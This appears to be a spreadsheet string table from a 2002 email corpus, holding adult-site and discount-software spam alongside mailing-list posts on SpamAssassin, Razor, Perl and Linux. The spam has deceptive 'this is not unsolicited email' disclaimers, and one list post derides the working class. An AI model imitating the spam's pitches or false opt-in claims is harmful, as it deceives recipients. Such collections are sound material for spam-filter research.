     &lt;TD&gt; &lt;IMG SRC="http://80.71.66.100/sc/spacer.gif" WIDTH=94 HEIGHT=1&gt;&lt;/TD&gt;
     &lt;TD&gt; &lt;IMG SRC="http://80.71.66.100/sc/spacer.gif" WIDTH=11 HEIGHT=1&gt;&lt;/TD&gt;
     &lt;TD&gt; &lt;IMG SRC="http://80.71.66.100/sc/spacer.gif" WIDTH=61 HEIGHT=1&gt;&lt;/TD&gt;
     &lt;TD&gt; &lt;IMG SRC="http://80.71.66.100/sc/spacer.gif" WIDTH=232 HEIGHT=1&gt;&lt;/TD&gt;
     &lt;TD&gt; &lt;IMG SRC="http://80.71.66.100/sc/spacer.gif" WIDTH=40 HEIGHT=1&gt;&lt;/TD&gt;
     &lt;TD&gt; &lt;IMG SRC="http://80.71.66.100/sc/spacer.gif" WIDTH=22 HEIGHT=1&gt;&lt;/TD&gt;
     &lt;TD&gt; &lt;IMG SRC="http://80.71.66.100/sc/spacer.gif" WIDTH=66 HEIGHT=1&gt;&lt;/TD&gt;
     &lt;TD&gt; &lt;IMG SRC="http://80.71.66.100/sc/spacer.gif" WIDTH=58 HEIGHT=1&gt;&lt;/TD&gt;
     &lt;TD&gt;&lt;/TD&gt;
   &lt;/TR&gt;
   &lt;TR&gt; 
     &lt;TD COLSPAN=9&gt; &lt;a href="http://80.71.66.100/sc/index.html"&gt;&lt;IMG SRC="http://80.71.66.100/sc/fullpage_fb_01.jpg" WIDTH=640 HEIGHT=28 border="0"&gt;&lt;/a&gt;&lt;/TD&gt;
     &lt;TD&gt; &lt;IMG SRC="http://80.71.66.100/sc/spacer.gif" WIDTH=1 HEIGHT=28&gt;&lt;/TD&gt;
   &lt;/TR&gt;
   &lt;TR&gt; 
     &lt;TD COLSPAN=2 ROWSPAN=3&gt; &lt;a href="http://80.71.66.100/sc/index.html"&gt;&lt;IMG SRC="http://80.71.66.100/sc/fullpage_fb_02.jpg" WIDTH=150 HEIGHT=196 border="0"&gt;&lt;/a&gt;&lt;/TD&gt;
     &lt;TD COLSPAN=4 ROWSPAN=2&gt; &lt;a href="http://80.71.66.100/sc/index.html"&gt;&lt;IMG SRC="http://80.71.66.100/sc/fullpage_fb_03.jpg" WIDTH=344 HEIGHT=136 border="0"&gt;&lt;/a&gt;&lt;/TD&gt;
     &lt;TD COLSPAN=3&gt; &lt;IMG SRC="http://80.71.66.100/sc/fullpage_fb_04.jpg" WIDTH=146 HEIGHT=8&gt;&lt;/TD&gt;
     &lt;TD&gt; &lt;IMG SRC="http://80.71.66.100/sc/spacer.gif" WIDTH=1 HEIGHT=8&gt;&lt;/TD&gt;
   &lt;/TR&gt;
   &lt;TR&gt; 
     &lt;TD COLSPAN=3 ROWSPAN=2&gt; &lt;a href="http://80.71.66.100/sc/index.html"&gt;&lt;IMG SRC="http://80.71.66.100/sc/fullpage_fb_05.jpg" WIDTH=146 HEIGHT=188 border="0"&gt;&lt;/a&gt;&lt;/TD&gt;
     &lt;TD&gt; &lt;IMG SRC="http://80.71.66.100/sc/spacer.gif" WIDTH=1 HEIGHT=128&gt;&lt;/TD&gt;
   &lt;/TR&gt;
   &lt;TR&gt; 
     &lt;TD COLSPAN=4 bgcolor="#000000"&gt; 
       &lt;div align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="5" color="#FF0000"&gt;&lt;b&gt;&lt;font size="4"&gt;Fist 
         Bang will show you everything you always wanted to see and could only 
         dream about!&lt;/font&gt;&lt;/b&gt;&lt;/font&gt; &lt;/div&gt;
     &lt;/TD&gt;
     &lt;TD&gt; &lt;IMG SRC="http://80.71.66.100/sc/spacer.gif" WIDTH=1 HEIGHT=60&gt;&lt;/TD&gt;
   &lt;/TR&gt;
   &lt;TR&gt; 
     &lt;TD COLSPAN=9 bgcolor="#000000"&gt;
       &lt;div align="center"&gt;&lt;IMG SRC="http://80.71.66.100/sc/fullpage_fb_16.jpg" width="355" height="61"&gt;&lt;/div&gt;
     &lt;/TD&gt;
     &lt;TD&gt; &lt;/TD&gt;
   &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;td align="center"&gt;&lt;font size="1" color="#999999" face="arial"&gt;Disclaimer:&lt;br&gt;We are strongly against sending unsolicited emails to those who do not wish to receive our special mailings. You have opted in to one or more of our affiliate sites requesting to be notified of any special offers we may run from time to time. We also have attained the services of an independent 3rd party to overlook list management and removal services.  This is NOT unsolicited email. If you do not wish to receive further mailings, please &lt;a href="http://80.71.66.100/index.php?cid=53&amp;eid=am1AbmV0bm90ZWluYy5jb20="&gt;click here to be removed from the list&lt;/a&gt;. Please accept our apologies if you have been sent this email in error. We honor all removal requests.&lt;/font&gt; &lt;/p&gt;&lt;/td&gt;
 				&lt;/tr&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Headlines for 2002-09-20
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Headline Mailer
 PerlQT 3 Released
     posted by ziggy on Thursday September 19, @10:41 (tools)
     http://use.perl.org/article.pl?sid=02/09/19/1443213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</si>
  <si>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[SAtalk] Still confused about spamd/c
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --Q68bSM7Ycu6FN28Q
 Content-Type: text/plain; charset=us-ascii
 Content-Disposition: inline
 Content-Transfer-Encoding: quoted-printable
 On Sat, Sep 14, 2002 at 04:27:47PM +0100, Justin Mason wrote:
 &gt; It's probably that razor needs to be "razor-register"'d for each user.
 &gt; Try creating a world-writable "home dir" for Razor and DCC et al to store
 &gt; their files in; that way spamd will share the razor server info etc.
 &gt; between all users.
 uh, no, you don't want to make it world-writable.  world-readable.
 &gt; Then use "spamd -H /path/to/world/writeable/dir" .
 Just remember that the .razor and whatever DCC uses needs to be
 world-readable as well.  The solution is then to make a world-writable
 log file for at least Razor.  I like symlinking /dev/null myself.
 &gt; IMO this is more efficient than using "spamd -H", which will use each
 &gt; user's own home dir for this data, but it's a matter of opinion ;)
 efficient?  probably (depends on the user base), but it also takes
 the control away from the user (which may or may not be a good thing,
 depending again on the user base...)
 --=20
 Randomly Generated Tagline:
 "What's funny?  I'd like to know.  Send me some E-Mail." - Prof. Farr
 --Q68bSM7Ycu6FN28Q
 Content-Type: application/pgp-signature
 Content-Disposition: inline
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: For info see http://www.gnupg.org
 iD8DBQE9g2GBAuOQUeWAs2MRAlljAKC+83f/mNoINBjoxOWBaNk4NgWsVQCg3qzO
 v0EQ6XGB3ufLLudAUAADtYA=
 =l7M5
 -----END PGP SIGNATURE-----
 --Q68bSM7Ycu6FN28Q--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</si>
  <si>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On Wed, 21 Aug 2002 10:38:04 +0200, Matthias Saou &lt;matthias@egwn.net&gt; wrote:
 &gt; This is a beta, probably of 8.0 although it's numbered 7.3.94. As such,
 &gt; I've set up no apt repository for it, although you may find a few of my
 &gt; packages recompiled for it under the /pub/freshrpms/null/ directory of my
 &gt; ftp server.
     Ah; ok.  I'll wait.  I've got enough bugs to swat, but I really look forward to it.  Every version before now has seemed to have been bugfixes and meaningful upgrades of subtle stuff; I expect this one to be the "no excuses to run Windows" release to which I can point the unwashed hordes.  
     :)
 ------------------------------------------------------------------------
 Brian Fahrlnder              Linux Zealot, Conservative, and Technomad
 Evansville, IN                    My Voyage: http://www.CounterMoon.com
 ICQ  5119262
 ------------------------------------------------------------------------
 I've been complaining for years, and almost no one listened. "Windows is
 just easier" you said. "I don't want to learn anything new", you said.
 Tell me how easy THIS is:
 http://www.guardian.co.uk/Archive/Article/0,4273,4477138,00.html
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 --------------050101050502080302080407
 Content-Type: text/plain; charset=us-ascii; format=flowed
 Content-Transfer-Encoding: 7bit
 I found a nice little Perl script for this purpose called rotate, which 
 makes the process of rotating log files very simple.  If there's an 
 official source for this script, I couldn't find it.  (My hosting 
 provider, pair.com, has it installed, and that's where I found it.) 
  However, redistribution appears to be allowed, so I've attached it.
 Good luck...
 L
 David Rees wrote:
 &gt;On Thu, Sep 05, 2002 at 08:53:16PM -0400, Theo Van Dinter wrote:
 &gt;  
 &gt;
 &gt;&gt;On Thu, Sep 05, 2002 at 06:16:57PM -0500, Mike Burger wrote:
 &gt;&gt;    
 &gt;&gt;
 &gt;&gt;&gt;You might be better asking this on the spamassassin-talk list.  The folks 
 &gt;&gt;&gt;there will almost definitely have an answer for this.
 &gt;&gt;&gt;      
 &gt;&gt;&gt;
 &gt;&gt;I posted a fairly lengthy complete answer to this problem and how to
 &gt;&gt;get around it in SA 2.41 on the spamassassin-talk list. :)
 &gt;&gt;    
 &gt;&gt;
 &gt;
 &gt;Thanks for the post there, it answered all my questions about
 &gt;spamassassin/razor interaction.
 &gt;
 &gt;Now for a razor question:
 &gt;
 &gt;I'm worried about having a server full of razor-agent.log files which keep
 &gt;on growing.  Is it possible to configure razor log via SYSLOG to make it
 &gt;easy to rotate logs?  Searching through the man pages didn't turn anything
 &gt;up...  Otherwise I'll have to write a script to go through each user's home
 &gt;directory looking for razor-agent.log files to rotate periodically.
 &gt;
 &gt;Thanks,
 &gt;Dave
 &gt;
 &gt;
 &gt;-------------------------------------------------------
 &gt;This sf.net email is sponsored by: OSDN - Tired of that same old
 &gt;cell phone?  Get a new here for FREE!
 &gt;https://www.inphonic.com/r.asp?r=sourceforge1&amp;refcode1=vs3390
 &gt;_______________________________________________
 &gt;Razor-users mailing list
 &gt;Razor-users@lists.sourceforge.net
 &gt;https://lists.sourceforge.net/lists/listinfo/razor-users
 &gt;  
 &gt;
 --------------050101050502080302080407
 Content-Type: application/x-java-applet;version=1.1.1;
  name="rotate"
 Content-Transfer-Encoding: base64
 Content-Disposition: inline;
  filename="rotate"
 IyEvdXNyL2Jpbi9wZXJsCjsjCjsjIENvcHlyaWdodCAoYykgMTk5NS0xOTk5CjsjCUlrdW8g
 TmFrYWdhd2EuIEFsbCByaWdodHMgcmVzZXJ2ZWQuCjsjCjsjIFJlZGlzdHJpYnV0aW9uIGFu
 ZCB1c2UgaW4gc291cmNlIGFuZCBiaW5hcnkgZm9ybXMsIHdpdGggb3Igd2l0aG91dAo7IyBt
 b2RpZmljYXRpb24sIGFyZSBwZXJtaXR0ZWQgcHJvdmlkZWQgdGhhdCB0aGUgZm9sbG93aW5n
 IGNvbmRpdGlvbnMKOyMgYXJlIG1ldDoKOyMKOyMgMS4gUmVkaXN0cmlidXRpb25zIG9mIHNv
 dXJjZSBjb2RlIG11c3QgcmV0YWluIHRoZSBhYm92ZSBjb3B5cmlnaHQKOyMgICAgbm90aWNl
 IHVubW9kaWZpZWQsIHRoaXMgbGlzdCBvZiBjb25kaXRpb25zLCBhbmQgdGhlIGZvbGxvd2lu
 Zwo7IyAgICBkaXNjbGFpbWVyLgo7IyAyLiBSZWRpc3RyaWJ1dGlvbnMgaW4gYmluYXJ5IGZv
 cm0gbXVzdCByZXByb2R1Y2UgdGhlIGFib3ZlIGNvcHlyaWdodAo7IyAgICBub3RpY2UsIHRo
 aXMgbGlzdCBvZiBjb25kaXRpb25zIGFuZCB0aGUgZm9sbG93aW5nIGRpc2NsYWltZXIgaW4g
 dGhlCjsjICAgIGRvY3VtZW50YXRpb24gYW5kL29yIG90aGVyIG1hdGVyaWFscyBwcm92aWRl
 ZCB3aXRoIHRoZSBkaXN0cmlidXRpb24uCjsjCjsjIFRISVMgU09GVFdBUkUgSVMgUFJPVklE
 RUQgQlkgVEhFIEFVVEhPUiBBTkQgQ09OVFJJQlVUT1JTIGBgQVMgSVMnJyBBTkQKOyMgQU5Z
 IEVYUFJFU1MgT1IgSU1QTElFRCBXQVJSQU5USUVTLCBJTkNMVURJTkcsIEJVVCBOT1QgTElN
 SVRFRCBUTywgVEhFCjsjIElNUExJRUQgV0FSUkFOVElFUyBPRiBNRVJDSEFOVEFCSUxJVFkg
 QU5EIEZJVE5FU1MgRk9SIEEgUEFSVElDVUxBUgo7IyBQVVJQT1NFIEFSRSBESVNDTEFJTUVE
 LiAgSU4gTk8gRVZFTlQgU0hBTEwgVEhFIEFVVEhPUiBPUiBDT05UUklCVVRPUlMKOyMgQkUg
 TElBQkxFIEZPUiBBTlkgRElSRUNULCBJTkRJUkVDVCwgSU5DSURFTlRBTCwgU1BFQ0lBTCwg
 RVhFTVBMQVJZLAo7IyBPUiBDT05TRVFVRU5USUFMIERBTUFHRVMgKElOQ0xVRElORywgQlVU
 IE5PVCBMSU1JVEVEIFRPLCBQUk9DVVJFTUVOVAo7IyBPRiBTVUJTVElUVVRFIEdPT0RTIE9S
 IFNFUlZJQ0VTOyBMT1NTIE9GIFVTRSwgREFUQSwgT1IgUFJPRklUUzsgT1IKOyMgQlVTSU5F
 U1MgSU5URVJSVVBUSU9OKSBIT1dFVkVSIENBVVNFRCBBTkQgT04gQU5ZIFRIRU9SWSBPRiBM
 SUFCSUxJVFksCjsjIFdIRVRIRVIgSU4gQ09OVFJBQ1QsIFNUUklDVCBMSUFCSUxJVFksIE9S
 IFRPUlQgKElOQ0xVRElORyBORUdMSUdFTkNFCjsjIE9SIE9USEVSV0lTRSkgQVJJU0lORyBJ
 TiBBTlkgV0FZIE9VVCBPRiBUSEUgVVNFIE9GIFRISVMgU09GVFdBUkUsCjsjIEVWRU4gSUYg
 QURWSVNFRCBPRiBUSEUgUE9TU0lCSUxJVFkgT0YgU1VDSCBEQU1BR0UuCjsjCjsjICRJZDog
 cm90YXRlLHYgMS42IDE5OTkvMTEvMTAgMjM6MTI6MjggaWt1byBFeHAgJAo7Iwo7IyBIb3cg
 dG8gdXNlIGByb3RhdGUnIHByb2dyYW06CjsjCjsjICAgVG8gcm90YXRlICIvdmFyL2xvZy94
 eHgubG9nIiB0byAiL3Zhci9sb2cveHh4LmxvZy5vbGQiLCBhbmQKOyMgICBjcmVhdGUgYSBu
 ZXcgZmlsZSAiL3Zhci9sb2cveHh4LmxvZyI6CjsjCXJvdGF0ZSAvdmFyL2xvZy94eHgubG9n
 CjsjCjsjICAgSWYgeW91IHdhbnQgdG8gcm90YXRlIGZpbGVzIHdpdGggc3VmZml4ZXMsIHRy
 eSBhZGRpdGlvbmFsCjsjICAgYXJndW1lbnQgZm9yIGByb3RhdGUnIGNvbW1hbmQuCjsjCXJv
 dGF0ZSAvdmFyL2xvZy94eHgubG9nIDIgMSAwCjsjCjsjICAgWW91IGNhbiBzcGVjaWZ5IHRo
 ZSBvd25lci9ncm91cCBvciBmaWxlIHBlcm1pc3Npb24gbW9kZSBmb3IKOyMgICB0aGUgbmV3
 IGZpbGUgKGxpa2UgYGluc3RhbGwnIGNvbW1hbmQpOgo7Iwlyb3RhdGUgLW8gcm9vdCAtZyB3
 aGVlbCAtbSA2NDQgL3Zhci9sb2cvbWVzc2FnZXMgMiAxIDAKOyMKOyMgICBZb3UgY2FuIGFs
 c28gY29tcHJlc3Mgcm90YXRlZCBmaWxlIHdpdGggYGd6aXAnOgo7Iwlyb3RhdGUgLXogL3Zh
 ci9sb2cvYWNjZXNzLmxvZyAyIDEgMAo7Iwo7IyAgIG9yIHdpdGggYGNvbXByZXNzJzoKOyMJ
 cm90YXRlIC1aIC92YXIvbG9nL2FjY2Vzcy5sb2cgMiAxIDAKOyMKOyMgVGhpcyBpcyBiZWNh
 dXNlIHdlIHN1cHBvcnRzIHBlcmwgdmVyc2lvbiA0LgpyZXF1aXJlICdnZXRvcHRzLnBsJzsK
 CjsjIEdldCBwcm9ncmFtIG5hbWUKKCRwcm9ncmFtKSA9ICgkMCA9fiBtJShbXi9dKykkJSk7
 Cgo7IyBGb3IgemVybyBiYXNlZCBpbmRleC4KJFsgPSAwOwoKOyMgU2hvdyBkZWJ1ZyBsb2cg
 dG8gU1RET1VULgpzdWIgZGVidWcgewoJbG9jYWwoJF8pOyAjIHVzZWQgaW4gZ3JlcC4KCWdy
 ZXAoKHByaW50ICIkX1xuIiksIEBfKSBpZiAkb3B0X3Y7Cn0KCjsjIEluaXRpYWxpemUgb3B0
 aW9ucyAoZm9yICJwZXJsIC1jdyIpLgp1bmRlZiAkb3B0X047CnVuZGVmICRvcHRfVDsKdW5k
 ZWYgJG9wdF9aOwp1bmRlZiAkb3B0X2c7CnVuZGVmICRvcHRfbTsKdW5kZWYgJG9wdF9uOwp1
 bmRlZiAkb3B0X287CnVuZGVmICRvcHRfdDsKdW5kZWYgJG9wdF92Owp1bmRlZiAkb3B0X3o7
 Cgo7IyBQYXJzaW5nIG9wdGlvbnMKdW5sZXNzICgmR2V0b3B0cygiTlRaZzptOm5vOnR2eiIp
 ICYmIGRlZmluZWQoJHRhcmdldCA9IHNoaWZ0KSkgewoJZGllIDw8IkVORCI7ClVzYWdlOiAk
 cHJvZ3JhbSBbb3B0aW9uc10gcGF0aCBbc3VmZml4IHN1ZmZpeCAuLi5dCk9wdGlvbnM6Cgkt
 dgl2ZXJib3NlIG1vZGUuCgktbglkbyBub3QgcmVhbCB3b3JrLiBvbmx5IHNob3cgcHJvY2Vz
 c2luZy4KCS1OCWRvIG5vdCBjcmVhdGUgYSBuZXcgZmlsZS4KCS16CWNvbXByZXNzIHdpdGgg
 YGd6aXAnLgoJLVoJY29tcHJlc3Mgd2l0aCBgY29tcHJlc3MnLgoJLW8Jc3BlY2lmeSBvd25l
 ci4KCS1nCXNwZWNpZnkgZ3JvdXAuCgktbQlzcGVjaWZ5IG1vZGUuCgktVAl1c2UgYFlZWVkt
 TU0tREQnIChnaXZlbiBieSBjdXJyZW50IHRpbWUpIGFzIHRoZSBkZWZhdWx0CgkJc3VmZml4
 LCBpbnN0ZWFkIG9mIGBvbGQnLgoJLXQJdXNlIGBZWVlZLU1NLUREJyAoZnJvbSBsYXN0IG1v
 ZGlmaWVkIHRpbWUgb2YgdGhlIHRhcmdldCkKCQlhcyB0aGUgZGVmYXVsdCBzdWZmaXgsIGlu
 c3RlYWQgb2YgYG9sZCcuCkVORAp9Cgo7IyBUZXN0IG1vZGUgcmVxdWlyZXMgdmVyYm9zZSBv
 cHRpb24KJG9wdF92KysgaWYgJG9wdF9uOwoKOyMgSWYgbm8gc3VmZml4IHdhcyBnaXZlbiwg
 d2UgZ2VuZXJhdGUgZGVmYXVsdCBvbmUuCnVubGVzcyAoQEFSR1YpIHsKCWlmICgkb3B0X1Qg
 fHwgJG9wdF90KSB7CgkJaWYgKCRvcHRfdCAmJiAhIC1lICR0YXJnZXQpIHsKCQkJZGllKCIk
 dGFyZ2V0IG11c3QgZXhpc3QgaWYgLXQgZmxhZyBpcyBzcGVjaWZpZWQuXG4iKTsKCQl9CgkJ
 JHQgPSAkb3B0X3QgPyAoc3RhdCgkdGFyZ2V0KSlbOV0gOiB0aW1lOwoJCUB0ID0gcmV2ZXJz
 ZSgobG9jYWx0aW1lKCR0KSlbMC4uNV0pOwoJCSR0WzBdICs9IDE5MDA7CgkJJHRbMV0rKzsK
 CQlAQVJHViA9IChzcHJpbnRmKCIlMDRkLSUwMmQtJTAyZCIsIEB0KSk7Cgl9IGVsc2UgewoJ
 CUBBUkdWID0gKCdvbGQnKTsKCX0KfQoKOyMgUm90YXRlIHRoZSB0YXJnZXQgZmlsZS4KJnNh
 ZmVfcm90YXRlKCR0YXJnZXQsIEBBUkdWKTsKCjsjIFRvdWNoIHRoZSBuZXcgb25lLgomc2Fm
 ZV9jcmVhdGUoJHRhcmdldCkgdW5sZXNzICRvcHRfTjsKCjsjIE5vcm1hbCB0ZXJtaW5hdGlv
 bi4KZXhpdDsKCjsjIFRvdWNoIGEgZmlsZS4gQ3JlYXRlIGEgbmV3IG9uZSBpZiBpdCBkb2Vz
 IG5vdCBleGlzdC4Kc3ViIHRvdWNoIHsKCWxvY2FsKCRhKSA9IEBfOwoJbG9jYWwoKkZJTEUp
 OwoKCSRhIG5lICcnICYmIG9wZW4oRklMRSwgJz4+Jy4kYSkgJiYgY2xvc2UoRklMRSkgJiYg
 LWUgJGE7Cn0KCjsjCnN1YiBzYWZlX3VubGluayB7Cglsb2NhbCgkYSkgPSBAXzsKCglpZiAo
 LWUgJGEpIHsKCQkmZGVidWcoInVubGluayBcIiRhXCIiKTsKCQkkb3B0X24gfHwgdW5saW5r
 KCRhKSB8fCBkaWUoInVubGluaygkYSk6ICQhIik7Cgl9Cn0KCjsjCnN1YiBzYWZlX3JlbmFt
 ZSB7Cglsb2NhbCgkYSwgJGIpID0gQF87ICMgZnJvbSwgdG8KCglpZiAoLWUgJGEpIHsKCQkm
 ZGVidWcoInJlbmFtZSBcIiRhXCIgdG8gXCIkYlwiIik7CgkJJG9wdF9uIHx8IHJlbmFtZSgk
 YSwgJGIpIHx8IGRpZSgicmVuYW1lKCRhLCAkYik6ICQhIik7Cgl9Cn0KCjsjCnN1YiBzYWZl
 X2NvbXByZXNzIHsKCWxvY2FsKCRhKSA9IEBfOwoKCWlmICgteiAkYSkgeyAjIGNvbXByZXNz
 IHdpbGwgZmFpbCBpbiB0aGlzIGNhc2UKCQkmZGVidWcoIndlIHdvbid0IGNvbXByZXNzIHpl
 cm8tc2l6ZWQgZmlsZTogXCIkYVwiIik7Cgl9IGVsc2UgewoJCSZkZWJ1ZygiY29tcHJlc3Mg
 XCIkYVwiIik7CgkJJG9wdF9uCXx8IHN5c3RlbSgnY29tcHJlc3MnLCAkYSkgPT0gMAoJCQl8
 fCBkaWUoInN5c3RlbShjb21wcmVzcywgJGEpOiBmYWlsdXJlLlxuIik7Cgl9Cn0KCjsjCnN1
 YiBzYWZlX2d6aXAgewoJbG9jYWwoJGEpID0gQF87CgoJJmRlYnVnKCJnemlwIFwiJGFcIiIp
 OwoJJG9wdF9uCXx8IHN5c3RlbSgnZ3ppcCcsICRhKSA9PSAwCgkJfHwgZGllKCJzeXN0ZW0o
 Z3ppcCwgJGEpOiBmYWlsdXJlLlxuIik7Cn0KCjsjIENyZWF0ZSBhIG5ldyBvbmUKc3ViIHNh
 ZmVfY3JlYXRlIHsKCWxvY2FsKCRhKSA9IHNoaWZ0OwoKCSZkZWJ1ZygidG91Y2ggXCIkYVwi
 Iik7Cgkkb3B0X24gfHwgJnRvdWNoKCRhKSB8fCBkaWUoInRvdWNoKCRhKTogJCEiKTsKCgkj
 IHNldCBvd25lciBhbmQgZ3JvdXAKCWlmIChkZWZpbmVkKCRvcHRfbykgfHwgZGVmaW5lZCgk
 b3B0X2cpKSB7CgkJbG9jYWwoJHVpZCwgJGdpZCkgPSAoc3RhdCgkYSkpWzQsIDVdOwoJCSFk
 ZWZpbmVkKCRvcHRfbykKCQkJfHwgKCgkdWlkID0gJG9wdF9vKSA9fiAvXlxkKyQvKQoJCQl8
 fCBkZWZpbmVkKCR1aWQgPSBnZXRwd25hbSgkb3B0X28pKQoJCQl8fCBkaWUoImdldHB3bmFt
 KCRvcHRfbyk6ICQhIik7CgkJIWRlZmluZWQoJG9wdF9nKQoJCQl8fCAoKCRnaWQgPSAkb3B0
 X2cpID1+IC9eXGQrJC8pCgkJCXx8IGRlZmluZWQoJGdpZCA9IGdldGdybmFtKCRvcHRfZykp
 CgkJCXx8IGRpZSgiZ2V0Z3JuYW0oJG9wdF9nKTogJCEiKTsKCQkmZGVidWcoImNob3duKCR1
 aWQsICRnaWQsIFwiJGFcIikiKTsKCQkkb3B0X24JfHwgY2hvd24oJHVpZCwgJGdpZCwgJGEp
 CgkJCXx8IGRpZSgiY2hvd24oJGEpOiAkISIpOwoJfQoKCSMgc2V0IGZpbGUgbW9kZQoJaWYg
 KGRlZmluZWQoJG9wdF9tKSkgewoJCSRvcHRfbSA9fiAvXlxkKyQvIHx8IGRpZSAiaWxsZWdh
 bCBtb2RlOiAkb3B0X21cbiI7CgkJJG9wdF9tID0gb2N0KCRvcHRfbSk7CgkJJmRlYnVnKCJj
 aG1vZCAiLnNwcmludGYoIiUwNG8iLCAkb3B0X20pLiIsIFwiJGFcIiIpOwoJCSRvcHRfbiB8
 fCBjaG1vZCgkb3B0X20sICRhKSB8fCBkaWUoImNobW9kKCRhKTogJCEiKTsKCX0KCgkjIHN1
 Y2Nlc3MuCgkxOwp9Cgo7IyBSb3RhdGUgLSBkbyByZWFsIHdvcmsuCnN1YiBzYWZlX3JvdGF0
 ZSB7Cglsb2NhbCgkYSkgPSBzaGlmdDsKCgkjIGNoZWNrIGV4aXN0ZW5jZSwgYW5kIHN1ZmZp
 eGVzCglyZXR1cm4gMCB1bmxlc3MgJGEgbmUgJycgJiYgLWUgJGEgJiYgQF87CgoJIyBsb2cg
 bWVzc2FnZQoJJmRlYnVnKCJyb3RhdGluZyBcIiRhXCIiKTsKCgkjIHJlbW92ZSBvbGRlc3Qg
 b25lCglsb2NhbCgkYikgPSAkYS4nLicuc2hpZnQ7Cgkmc2FmZV91bmxpbmsoJGIpOwoJJnNh
 ZmVfdW5saW5rKCRiLicuWicpOwoJJnNhZmVfdW5saW5rKCRiLicuZ3onKTsKCgkjIGxvb3Ag
 dG8gcm90YXRlIGZpbGVzCgl3aGlsZSAoQF8pIHsKCQlsb2NhbCgkeCkgPSAkYS4nLicuc2hp
 ZnQ7CgkJJnNhZmVfcmVuYW1lKCR4LCAkYik7CgkJJnNhZmVfcmVuYW1lKCR4LicuWicsICRi
 LicuWicpOwoJCSZzYWZlX3JlbmFtZSgkeC4nLmd6JywgJGIuJy5neicpOwoJCSRiID0gJHg7
 Cgl9CgoJIyByb3RhdGUgbGFzdCBvbmUKCSZzYWZlX3JlbmFtZSgkYSwgJGIpOwoKCSMgc2hh
 bGwgd2UgY29tcHJlc3Mgcm90YXRlZCBvbmU/Cgkkb3B0X3ogPyAmc2FmZV9nemlwKCRiKSA6
 ICRvcHRfWiA/ICZzYWZlX2NvbXByZXNzKCRiKSA6IDE7Cn0K
 --------------050101050502080302080407--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</si>
  <si>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JPEGs patented
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Are you quoting the Beatles version or the Laibach version?
 :-)
 Actually it's from Missing Mole's My Lubavitcher Mama featuring Milton 
 Berners-Sinatra.  The version that was recorded in GIF-sur-Yvette, Fr.
 Cheers,
 Wayne
 Our work is semantic, our language protocol.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 2002-07-26 at 11:50, Ian Andrew Bell wrote:
 &gt; The ruling class, whether you define them as government or business 
 &gt; (what's the difference?) knows full well where that money is.  It's 
 &gt; lining their pockets, buying their hobby ranches, and financing 
 &gt; their private jets.
 &gt; 
 &gt; Neither has any interest in the welfare of the working class.
 Yes, and the working class deserves what it gets, and possibly not even
 that.  For the most part, people become wealthy by not being stupid.  I
 always thought "not being stupid (most of the time)" was a fairly low
 bar, but apparently most people can't even manage that.
 That is really what it all boils down to:  There are lots of ignorant
 and/or stupid people who are quite happy to stay that way, and it is a
 key causal factor in why things are the way they are.  What are you
 going to do about it?
 -James Rogers
  jamesr@best.com
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re:[1]Save over $70 on this exquisite software suite. 32004
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv=3D"Content-Language" content=3D"en-us"&gt;
 &lt;meta name=3D"GENERATOR" content=3D"Microsoft FrontPage 4.0"&gt;
 &lt;meta name=3D"ProgId" content=3D"FrontPage.Editor.Document"&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dwindows-=
 1252"&gt;
 &lt;title&gt;Norton AD&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;table border=3D"0" width=3D"489" height=3D"54" bgcolor=3D"#FFFFFF"&gt;
   &lt;tr&gt;
     &lt;td width=3D"100%" height=3D"48" bgcolor=3D"#FFFFFF" align=3D"center"&gt;=
 &lt;font face=3D"Impact" color=3D"#CC0000" size=3D"3"&gt;Take
       Control of Your Computer With This Top-of-the-Line Software!&lt;/font&gt;&lt;=
 /td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table border=3D"5" cellspacing=3D"3" width=3D"489" cellpadding=3D"3" bgco=
 lor=3D"#990033"  bordercolor=3D"#FFFFFF" style=3D"border-collapse: collaps=
 e" bordercolordark=3D"#000000" height=3D"567" bordercolorlight=3D"#FFFF99"=
 &gt;
   &lt;tr&gt;
     &lt;td width=3D"467" height=3D"555" bordercolorlight=3D"#FFFFFF" borderco=
 lordark=3D"#FFFF99"&gt;
       &lt;table border=3D"6" width=3D"100%" height=3D"86" bgcolor=3D"#FFFF99"=
  bordercolor=3D"#FFFFFF"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%" height=3D"80" align=3D"center"&gt;&lt;b&gt;&lt;font color=
 =3D"#FF0000" face=3D"Tahoma" size=3D"6"&gt;Norton
             SystemWorks 2002 &lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"5" color=
 =3D"#000000"&gt; Software Suite&lt;/font&gt;&lt;font color=3D"#FF0000" face=3D"Times N=
 ew Roman" size=3D"6"&gt;&lt;br&gt;
             -&lt;i&gt;Professional Edition&lt;/i&gt;-&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;table border=3D"0" width=3D"100%" height=3D"62"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%" height=3D"56" align=3D"center"&gt;&lt;b&gt;&lt;font face=3D=
 "Tahoma" color=3D"#FFFFFF" size=3D"4"&gt;Includes
             Six - &lt;/font&gt;&lt;i&gt;&lt;font face=3D"Tahoma" size=3D"4" color=3D"#FFF=
